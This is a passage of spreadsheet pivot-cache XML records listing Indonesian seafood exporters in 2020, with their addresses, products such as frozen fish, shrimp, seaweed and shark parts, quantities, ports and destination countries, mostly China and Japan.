    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Pelagis Beku (Teri, Tongkol, Kembung, Tenggiri, Layang, Nike)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20570"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Air Tawar Beku (Lele, Patin, Nila)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20636"/>
    <x v="335"/>
    <s v="PT, ALGAE SUMBA TIMUR LESTARI"/>
    <s v="Desa Tanamanang, Kec, Pahunga Lodu, Kabupaten Sumba Timur&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="1257115.75"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20804"/>
    <x v="240"/>
    <s v="UD. TOMINI BAY SEAFOOD"/>
    <s v="Jl. Raya Manado Tomohon 79, Kel. Pineleng II, Kec. Pineleng, Kabupaten Minahasa&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Manado"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16664"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Beku (Lele, Mas, Gurami, Betutu, Patin, Nila)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16667"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16668"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Hiu Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16671"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16673"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Makerel, Marlin, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16674"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Manyung, Kerapu, Layur, Bawal, Kakap, Barramundi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16710"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Air Tawar Beku (Gurami, Patin, Nila)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16716"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16720"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16848"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Barramundi, Mata Besar, Lencam, Sebelah, Manyung, Kerapu, Layur, Kakatua, Bawal, Kakap, Ayam-ayam, Lidah, Kurisi)"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="26238"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16885"/>
    <x v="337"/>
    <s v="CV. MITRA RATU MANDIRI"/>
    <s v="Komp. Pelabuhan Perikanan Nusantara Palabuhanratu (PPNP) RT 03 RW 19, Kel. Palabuhanratu, Kec. Sukabumi, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="16949"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16950"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16978"/>
    <x v="339"/>
    <s v="PT. KELOLA MINA LAUT REMBANG"/>
    <s v="Desa Purworejo RT 03 RW 02, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Himego Kering"/>
    <d v="2020-04-03T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16979"/>
    <x v="339"/>
    <s v="PT. KELOLA MINA LAUT REMBANG"/>
    <s v="Desa Purworejo RT 03 RW 02, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teri Nasi Kering"/>
    <d v="2020-04-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="17010"/>
    <x v="340"/>
    <s v="PT, BIOTA LAUT GANGGANG"/>
    <s v="Jl, Kebangkitan No,8, Dusun Belabelawa, Kel, Polewali, Kec, Suppa, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-02-19T00:00:00"/>
    <n v="7300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="17011"/>
    <x v="340"/>
    <s v="PT, BIOTA LAUT GANGGANG"/>
    <s v="Jl, Kebangkitan No,8, Dusun Belabelawa, Kel, Polewali, Kec, Suppa, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tepung Rumput Laut"/>
    <d v="2020-02-19T00:00:00"/>
    <n v="7300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="17013"/>
    <x v="340"/>
    <s v="PT, BIOTA LAUT GANGGANG"/>
    <s v="Jl, Kebangkitan No,8, Dusun Belabelawa, Kel, Polewali, Kec, Suppa, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Karagenan"/>
    <d v="2020-02-19T00:00:00"/>
    <n v="7300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="17068"/>
    <x v="341"/>
    <s v="PT. KUSUMA KAISAN"/>
    <s v="Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Teri Kering"/>
    <d v="2020-02-11T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="17134"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="17135"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Segar (Sebelah, Biji Nangka, Kerapu, Gerot-gerot, Layur, Jenaha, Bawal, Kakap, Kuro, Kurisi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="154000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="17295"/>
    <x v="342"/>
    <s v="CV. BEE JAY SEAFOODS"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Mayangan, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Layang, Tenggiri)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19250"/>
    <x v="343"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="700000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19262"/>
    <x v="198"/>
    <s v="CV. NOGO SEGORO"/>
    <s v="Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="270000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19263"/>
    <x v="198"/>
    <s v="CV. NOGO SEGORO"/>
    <s v="Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="8000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19362"/>
    <x v="156"/>
    <s v="UD. ANUGERAH BINTANG CEMERLANG"/>
    <s v="Jl. Bambu Runcing No.99, Kel. Bonto Talassa, Kec. Simbang, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="14400"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19472"/>
    <x v="344"/>
    <s v="PT. PERFECT INTERNATIONAL FOOD"/>
    <s v="Jl. Raya Gintik RT 005 RW 002, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="700000000"/>
    <m/>
    <s v="Ghana"/>
  </r>
  <r>
    <n v="19594"/>
    <x v="171"/>
    <s v="PT. HALINDO BERJAYA MANDIRI"/>
    <s v="Jl. Burhanuddin LK II, Kel. Perjuangan, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19595"/>
    <x v="171"/>
    <s v="PT. HALINDO BERJAYA MANDIRI"/>
    <s v="Jl. Burhanuddin LK II, Kel. Perjuangan, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19668"/>
    <x v="60"/>
    <s v="KSU ADI JAYA LESTARI"/>
    <s v="Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Tongkol, Marlin, Layang, Cakalang)"/>
    <d v="2020-02-25T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19672"/>
    <x v="345"/>
    <s v="PT. BANDENG OERANG SEJAHTERA"/>
    <s v="Jl. Brigjen Katamso No.24 RT 004 RW 004, Kel. Kampung Dalem, Kec. Kota, Kota Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19703"/>
    <x v="346"/>
    <s v="PT. ARUMIA KHARISMA INDONESIA"/>
    <s v="Jl. Tongkol Komplek Kantor Pelabuhan Perikanan Donggala, Kel. Labuan Bajo, Kec. Banawa, Kabupaten Donggala&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="143000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19727"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19729"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Beku"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19731"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cacing Laut Beku"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="19738"/>
    <x v="347"/>
    <s v="PT. NICHINDO MANADO SUISAN"/>
    <s v="Jl. Trans Sulawesi Km 52 Lingkungan VII, Kel. Pondang, Kec. Amurang Timur, Kabupaten Minahasa Selatan&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tepung Ikan"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19803"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Campuran Seafood Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="58214"/>
    <m/>
    <s v="Italy"/>
  </r>
  <r>
    <n v="19985"/>
    <x v="348"/>
    <s v="CV. SUNLEE AGUNG"/>
    <s v="Legundi Sumo Estate A - 55, Kel. Krikilan, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20108"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Berlapis Tepung Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20119"/>
    <x v="79"/>
    <s v="PT. ALTER TRADE INDONESIA"/>
    <s v="Jl. Industri No.72, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Campuran Seafood Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="7500"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20138"/>
    <x v="349"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Rembang-Juana Km 5, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teri Nasi Kering"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="90000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20139"/>
    <x v="349"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Rembang-Juana Km 5, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Himego Kering"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20163"/>
    <x v="350"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Wijaya IV No. 2, Randugarut, Tugu, Semarang, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Ikan Berlapis Tepung Beku"/>
    <d v="2020-09-02T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20186"/>
    <x v="164"/>
    <s v="PT. SARI SEGAR LAUT INDONESIA"/>
    <s v="Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20190"/>
    <x v="351"/>
    <s v="PT. BOGATAMA MARINUSA"/>
    <s v="Jl. Kima Raya 2 Kav N-4 B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="110000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20191"/>
    <x v="351"/>
    <s v="PT. BOGATAMA MARINUSA"/>
    <s v="Jl. Kima Raya 2 Kav N-4 B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="192000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20192"/>
    <x v="351"/>
    <s v="PT. BOGATAMA MARINUSA"/>
    <s v="Jl. Kima Raya 2 Kav N-4 B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20222"/>
    <x v="169"/>
    <s v="CV. GIOVANNI SUKSES MAKMUR"/>
    <s v="Jl. Berbek Industri 5 No.1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tulang Ikan Kering"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20240"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Sirip Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20241"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20243"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tulang Hiu Beku"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20244"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kepiting Beku"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="3600"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20245"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Kepiting Beku"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="3600"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20261"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Manyung, Kuwe, Alu-alu, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Cunang, Barramundi)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20282"/>
    <x v="164"/>
    <s v="PT. SARI SEGAR LAUT INDONESIA"/>
    <s v="Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Katsu Beku"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="3500"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20384"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Egypt"/>
  </r>
  <r>
    <n v="20404"/>
    <x v="353"/>
    <s v="PT. AGB PALABUHANRATU"/>
    <s v="Jl. Siliwangi Pelabuhan Perikanan Nusantara, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-Cumi)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20415"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Pari Berbumbu Kering"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20416"/>
    <x v="352"/>
    <s v="PT. NIHON NOVELICA FOOD"/>
    <s v="Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tulang Pari Kering"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="96000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20421"/>
    <x v="306"/>
    <s v="PT, SUMBER PANGAN NUSANTARA"/>
    <s v="Jl, Raya Buduran No,555, Kel, Buduran, Kec, Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Layur, Bawal, Kakap)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="350000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20422"/>
    <x v="306"/>
    <s v="PT, SUMBER PANGAN NUSANTARA"/>
    <s v="Jl, Raya Buduran No,555, Kel, Buduran, Kec, Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Pisang-pisang, Cakalang)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="350000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20424"/>
    <x v="306"/>
    <s v="PT, SUMBER PANGAN NUSANTARA"/>
    <s v="Jl, Raya Buduran No,555, Kel, Buduran, Kec, Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="350000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20425"/>
    <x v="306"/>
